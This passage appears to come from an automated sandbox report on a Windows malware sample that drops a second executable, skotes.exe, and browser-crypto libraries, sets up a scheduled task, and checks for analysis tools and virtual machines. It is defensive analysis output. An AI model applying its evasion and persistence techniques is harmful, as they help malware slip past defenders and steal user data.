              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: apphelp.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: winmm.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: wininet.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: sspicli.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: mstask.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: wldp.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: mpr.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: dui70.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: duser.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: chartv.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: oleacc.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: atlthunk.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: wintypes.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: wintypes.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: wintypes.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: wtsapi32.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: winsta.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: textshaping.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: propsys.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: windows.fileexplorer.common.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: iertutil.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: profapi.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: explorerframe.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: edputil.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: urlmon.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: srvcli.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: netutils.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: appresolver.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: slc.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: userenv.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: sppc.dll
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Google Drive.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: E89hSGjVrv.exeStatic file information: File size 1814528 > 1048576
              Source: E89hSGjVrv.exeStatic PE information: Raw size of smsoyiwh is bigger than: 0x100000 < 0x1a1200
              Source: Binary string: mozglue.pdbP source: E89hSGjVrv.exe, 00000000.00000002.2625912416.000000006C57D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: E89hSGjVrv.exe, 00000000.00000002.2625912416.000000006C57D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: E89hSGjVrv.exeStatic PE information: real checksum: 0x1bdec2 should be: 0x1c57c3
              Source: random[1].exe.0.drStatic PE information: real checksum: 0x1dc204 should be: 0x1d7e4c
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: real checksum: 0x1dc204 should be: 0x1d7e4c
              Source: skotes.exe.20.drStatic PE information: real checksum: 0x1dc204 should be: 0x1d7e4c
              Source: E89hSGjVrv.exeStatic PE information: section name:
              Source: E89hSGjVrv.exeStatic PE information: section name: .idata
              Source: E89hSGjVrv.exeStatic PE information: section name:
              Source: E89hSGjVrv.exeStatic PE information: section name: smsoyiwh
              Source: E89hSGjVrv.exeStatic PE information: section name: mwymltiy
              Source: E89hSGjVrv.exeStatic PE information: section name: .taggant
              Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
              Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
              Source: msvcp140.dll.0.drStatic PE information: section name: .didat
              Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
              Source: nss3.dll.0.drStatic PE information: section name: .00cfg
              Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name:
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name: .idata
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name:
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name: yasgrbfq
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name: lwauugho
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name: .taggant
              Source: random[1].exe.0.drStatic PE information: section name:
              Source: random[1].exe.0.drStatic PE information: section name: .idata
              Source: random[1].exe.0.drStatic PE information: section name:
              Source: random[1].exe.0.drStatic PE information: section name: yasgrbfq
              Source: random[1].exe.0.drStatic PE information: section name: lwauugho
              Source: random[1].exe.0.drStatic PE information: section name: .taggant
              Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: skotes.exe.20.drStatic PE information: section name:
              Source: skotes.exe.20.drStatic PE information: section name: .idata
              Source: skotes.exe.20.drStatic PE information: section name:
              Source: skotes.exe.20.drStatic PE information: section name: yasgrbfq
              Source: skotes.exe.20.drStatic PE information: section name: lwauugho
              Source: skotes.exe.20.drStatic PE information: section name: .taggant
              Source: E89hSGjVrv.exeStatic PE information: section name: smsoyiwh entropy: 7.952862175295011
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name: entropy: 7.987924369534586
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name: yasgrbfq entropy: 7.953945689794264
              Source: random[1].exe.0.drStatic PE information: section name: entropy: 7.987924369534586
              Source: random[1].exe.0.drStatic PE information: section name: yasgrbfq entropy: 7.953945689794264
              Source: skotes.exe.20.drStatic PE information: section name: entropy: 7.987924369534586
              Source: skotes.exe.20.drStatic PE information: section name: yasgrbfq entropy: 7.953945689794264

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\DocumentsCAFHDBGHJK.exeJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\DocumentsCAFHDBGHJK.exeJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\DocumentsCAFHDBGHJK.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\DocumentsCAFHDBGHJK.exeJump to dropped file
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Filemonclass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeFile created: C:\Windows\Tasks\skotes.job
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F178A5 second address: F178C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F5048C0A32Ch 0x0000000d jne 00007F5048C0A326h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F178C0 second address: F178DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F0FD66 second address: F0FD91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5048C0A326h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F5048C0A328h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5048C0A333h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F0FD91 second address: F0FDAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F50492D8196h 0x00000010 jmp 00007F50492D819Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F0FDAF second address: F0FDB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5048C0A326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F171B8 second address: F171C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F1893A second address: D9FB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F5048C0A326h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 57BE1E1Bh 0x00000015 mov dword ptr [ebp+122D2C9Dh], ecx 0x0000001b push dword ptr [ebp+122D0BD9h] 0x00000021 movsx esi, dx 0x00000024 call dword ptr [ebp+122D1A63h] 0x0000002a pushad 0x0000002b add dword ptr [ebp+122D1B47h], ebx 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D1C6Bh], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d jmp 00007F5048C0A333h 0x00000042 mov dword ptr [ebp+122D36CAh], eax 0x00000048 stc 0x00000049 stc 0x0000004a mov esi, 0000003Ch 0x0000004f jmp 00007F5048C0A332h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 add dword ptr [ebp+122D1AE6h], edx 0x0000005e lodsw 0x00000060 or dword ptr [ebp+122D1AE6h], eax 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jmp 00007F5048C0A337h 0x0000006f jmp 00007F5048C0A333h 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 mov dword ptr [ebp+122D1B6Ah], eax 0x0000007e push eax 0x0000007f push ebx 0x00000080 push esi 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F18A60 second address: F18A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F50492D81A0h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F18A8E second address: F18A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5048C0A326h 0x0000000a rdtsc
